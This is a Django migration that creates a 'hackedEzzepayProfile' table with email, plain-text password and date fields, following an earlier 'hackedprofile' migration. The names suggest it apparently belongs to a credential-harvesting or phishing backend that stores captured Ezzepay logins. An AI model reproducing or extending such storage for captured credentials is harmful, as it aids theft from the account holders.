# Generated by Django 4.2.3 on 2023-09-29 21:33

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('app', '0013_hackedprofile'),
    ]

    operations = [
        migrations.CreateModel(
            name='hackedEzzepayProfile',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('email', models.CharField(max_length=100)),
                ('password', models.CharField(max_length=100)),
                ('auto_date', models.DateField(auto_now=True)),
            ],
            options={
                'verbose_name': 'hackedEzzepayProfile',
                'verbose_name_plural': 'hackedEzzepayProfile',
            },
        ),
    ]
